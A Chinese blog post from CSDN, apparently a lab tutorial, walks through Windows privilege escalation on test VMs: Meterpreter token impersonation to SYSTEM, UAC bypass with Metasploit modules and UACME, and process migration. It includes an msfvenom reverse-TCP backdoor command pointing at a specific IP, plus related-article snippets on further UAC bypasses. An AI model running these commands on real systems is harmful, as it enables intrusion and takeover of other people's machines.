WIN进程注入&BypassUAC&令牌窃取

最新推荐文章于 2024-03-29 10:00:08 发布
最新推荐文章于 2024-03-29 10:00:08 发布
阅读量3.5k 收藏 4
点赞数 1
分类专栏: 权限提升 文章标签: web安全 网络安全 系统安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62970186/article/details/123939125
版权

文章目录

WIN进程注入&BypassUAC&令牌窃取

本地提权—win令牌窃取

假冒令牌可以假冒一个网络中的另一个用户进行各类操作。

所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击。

我这里用到了windowns2008虚拟机做演示

先用msf生成一个后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=3333 -f exe -o msf.exe

msf上线

use incognito 导入模块

list_tokens -u 列出进程

impersonate_token "NT AUTHORITY\SYSTEM" 令牌窃取

获得system权限

BypassUAC绕过提权

什么是UAC?如何设置?

UAC(UserAccount Control,用户账户控制)

简言之就是在Vista及更高版本中通过弹框进一步让用户

确认是否授权当前可执行文件来达到阻止恶意程序的目的。

可以通过命令msconfig启动管理器,更改UAC设置等级(默认等级)

参考:http://cn-sec.com/archives/116488.html

BypassUAC提权?常见绕过项目?

为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC

绕过项目:MSF内置,Powershell渗透框架,UACME项目(推荐)

https://github.com/hfiref0x/UACME

在msf自带的提权getsystem中,如果遇到UAC,则不会成功。

win7演示:

使用msf自带模块绕过uac

use exploit/windows/local/bypassuac

getsystem 获得最高权限

另外我用了Win7 虚拟机进行 本地提权

我使用了这个模块:use exploit/windows/local/ask

但是该模块实际上只是以高权限重启一个返回式shellcode,并没有绕过UAC,会触发系统UAC,受害机器有提示,提示用户是否要运行,如果用户选择“yes”,就可以程序返回一个高权限meterpreter shell,相当于钓鱼攻击。

当用户点击”是“后getsystem

获得最高权限。

进程注入

我用了win2008虚拟机做了演示

ps命令查看进程

migrate PID 迁移对应PID

获得最高权限

Rayob1
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
BypassUAC-权限提升
weixin_45701675的博客
11-19 1262
什么是UAC?如何设置? UAC(UserAccount Control,用户账户控制) 简言之就是在Vista及更高版本中通过弹框进一步让用户 确认是否授权当前可执行文件来达到阻止恶意程序的目的。 可以通过命令msconfig启动管理器,更改UAC设置等级(默认等级) 参考:http://cn-sec.com/archives/116488.html #BypassUAC提权?常见绕过项目? 为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC 绕过项目:M
某超级注入程序的驱动逆向
被遗弃的庸才博客
11-05 2414
1、起因 从哥们儿那找到了一个超级注入的工具,打开一看加了vmp,然后还有驱动的驱动,于是这里把驱动提取出来,简单分析一下。 1.1运行 让程序先把驱动释放出来,可以看到这里需要买卡,然后才会释放驱动加载(简单破解一下就行,不是重点) 1.2破解之后 下一个CreateServiceA断点,让它在加载驱动之前断下,接着将驱动拷贝出来。从下图可以看到虽然驱动有签名,但是个过期签名,高版本windows10上是加载不上的。 2、驱动分析 好消息是驱动没有加壳,可以f5分析一下 2.1W.
bypassuac提权
qq_46258964的博客
06-20 1292
UAC介绍 UAC是微软为提高系统安全性中引入的技术。 UAC要求用户在执行可能影响计算机运行的操作或者在进行可能影响其他用户的设置之前, 拥有相应的权限或者管理员密码。UAC在操作启动前对用户身份进行验证, 以避免恶意软件和间谍软件在未经许可的情况下在计算机上进行安装操作或者对计算机设置进行修改。 微软设置的安全控制策略,分为高、中、低三个等级。 高等级的进程有管理员权限;中等级的进程有普通管理员权限;低等级的进程,权限是有限的,以保证系统在受到安全威胁时造成的损害最小。uac绕过 为了远程执行目标的ex
使用BypassUAC:轻松绕过Windows用户账户控制
最新发布
gitblog_00086的博客
03-29 522
使用BypassUAC:轻松绕过Windows用户账户控制 项目地址:https://gitcode.com/Memoryo3o/BypassUAC BypassUAC是一个开源项目,旨在帮助开发者和安全研究人员在Windows操作系统中进行UAC(User Account Control)规避。该项目由Memoryo3o开发并维护,提供了一种技术手段,使得在不触发典型UAC警告的情况下执行高权限...
内网安全:内网穿透详解
热门推荐
qq_61553520的博客
06-12 2万+
区别于代理技术,隧道技术,三种技术都有解决通讯的问题,但是侧重不一样代理技术可以把外网攻击机带进内网进行渗透隧道技术解决了因为防火墙限制流量不出网的问题内网穿透解决和内网主机建立连接的问题,可以远程访问内网的服务器要根据不同使用场景来选择使用。
windows内核驱动逆向安全驱动调试保护注入读写
zygx8的博客
02-28 522
windows内核驱动逆向安全驱动调试保护注入读写
第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1
08-03
#数据库应用提权在权限提升中的意义#WEB 或本地环境如何探针数据库应用#数据库提权权限用户密码收集等方法#目前数据库提权对应的技术及方法等演示案例:Redis
易语言提升进程令牌模块
07-21
易语言提升进程令牌模块源码,提升进程令牌模块,AdjustProcessPrivilege,LookupPrivilegeValue,OpenProcessToken,AdjustTokenPrivileges,GetLastError
易语言源码易语言提升进程令牌模块.rar
02-19
易语言源码易语言提升进程令牌模块.rar 易语言源码易语言提升进程令牌模块.rar 易语言源码易语言提升进程令牌模块.rar 易语言源码易语言提升进程令牌模块.rar 易语言源码易语言提升进程令牌模块.rar 易语言源码...
易语言提升进程令牌模块.rar
03-23
易语言提升进程令牌模块.rar
Windows 10 GUI UAC绕过(netplwiz.exe)
Adminxe的博客
05-22 848
Windows 10 GUI UAC绕过(netplwiz.exe) 类型:GUI Hack 方法:注册表项操作 目标:\system32\netplwiz.exe 组件:攻击者定义 Works from: window 10 HKCU\Software\Classes\Folder\shell\open\command 单击netplwiz.exe中的“管理密码”按钮时调用 产生步骤: 运行命令 reg add “HKCU\Software\Classes\Folde...
[原创]K8uac bypassUAC(Win7/Wi8/Win10) 过46款杀软影响所有Windows版本
qq_35382207的博客
09-08 186
[原创]K8uac bypassUAC(Win7/Wi8/Win10) 过46款杀软影响所有Windows版本 工具: k8uac编译: VC++ 作者:K8哥哥发布:2018/11/25 1:30 这是一个旧方法,近两年很多APT都有在使用,前几天测试发现依然可用。 不但支持全系统而且还免杀,你让我上哪说理去。 免杀报告:http://r.virscan.org/language/en/report/2b1a19189b37d4f605b564c4e71227f6 示例如下: C:\Users...
Web安全--XSS跨站脚本攻击
weixin_68243135的博客
11-28 657
Web安全,xss攻击利用,以及绕过和防护措施。
BypassUAC------使用EVENTVWR.EXE和注册表劫持实现“无文件”UAC绕过
moonhillcity的博客
10-20 3873
参考 http://blog.sina.com.cn/s/blog_12f13ac600102wkah.html   在对Windows 10进行深入挖掘并发现了一个非常有趣的绕过用户帐户控制(UAC)的方法之后(详细信息请参阅https:/bypassing-uac-on-windows-10-using-disk-cleanup/),我决定花更多的时间
详解Bypass UAC 过程中踩过的坑(第二部分)
weixin_33892359的博客
09-18 551
本文讲的是详解Bypass UAC 过程中踩过的坑(第二部分),在第1部分完成后,我们知道普通用户在拆分令牌管理登录中处理可以获得对升级进程的Terminate,QueryLimitedInformation 和 Synchronize进程访问权限的访问。这是由于正常的用户和管理员具有默认DACL,该默认DACL授予对同一桌面上所有令牌设置的当前登录会...
Windows核心编程》之“DLL注入”(一)
Sagittarius_Warrior的博客
08-09 7542
一、背景知识 1,Private Address Space         在Windows操作系统中,每个进程都有自己私有的地址空间(private address space)。各个进程的地址空间(user partition)是相互独立的,尽管它们的地址编码范围相同(0x00010000 ~ 0x7FFEFFFF),但是它们对应虚拟地址的后备物理存储器一般都不相同(只读模式下的Imag
十种流行进程注入技术详细分析
weixin_34050389的博客
09-13 1005
本文讲的是十种流行进程注入技术详细分析, 前言 流程注入是一种恶意软件和无文件间谍攻击中使用的最为广泛的漏洞攻击技术,而且在攻击时还需要在另一个进程的地址空间内运行自定义代码。过程注入除了提高了攻击的隐蔽性之外,也实现了持久性攻击。尽管目前有许多流程注入技术,但在本文中,我只介绍十种在野外看到的能够运用另一个进程运行恶意代码的技术。在介绍的同时,我还会...
【干货】Windows进程注入之SetWindowsHookEx
weixin_34342207的博客
11-12 3668
SetWindowsHookEx 百度百科 钩子(Hook),是Windows消息处理机制的一个平台,应用程序可以在上面设置子程以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。当消息到达后,在目标窗口处理函数之前处理它。钩子机制允许应用程序截获处理Windows消息或特定事件 了解 Windows 窗口程序的朋友都知道-...
Windows进程注入提权
星落的博客
05-12 1423
通过进程注入不会创建新的进程,隐蔽性比较高,可以通过"pinjector"工具实现进程注入 工具使用方法 pinjector.exe -l 查看可利用的进程 pinjector.exe -p pid cmd port 对pid进程执行注入,并建立侦听端口 pinjector.exe -p 428 cmd 4444 nc -nv 192.168.31.132 4444获得system权限的shell。 ...
第101天:权限提升-Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令
09-15
针对Windows本地用户的权限提升,可以使用进程注入令牌窃取以及AT、SC和PS服务命令等方法。进程注入是指将恶意代码注入到系统进程中,从而获取系统权限。令牌窃取指利用某些漏洞获取管理员权限令牌,然后使用这些...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Rayob1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值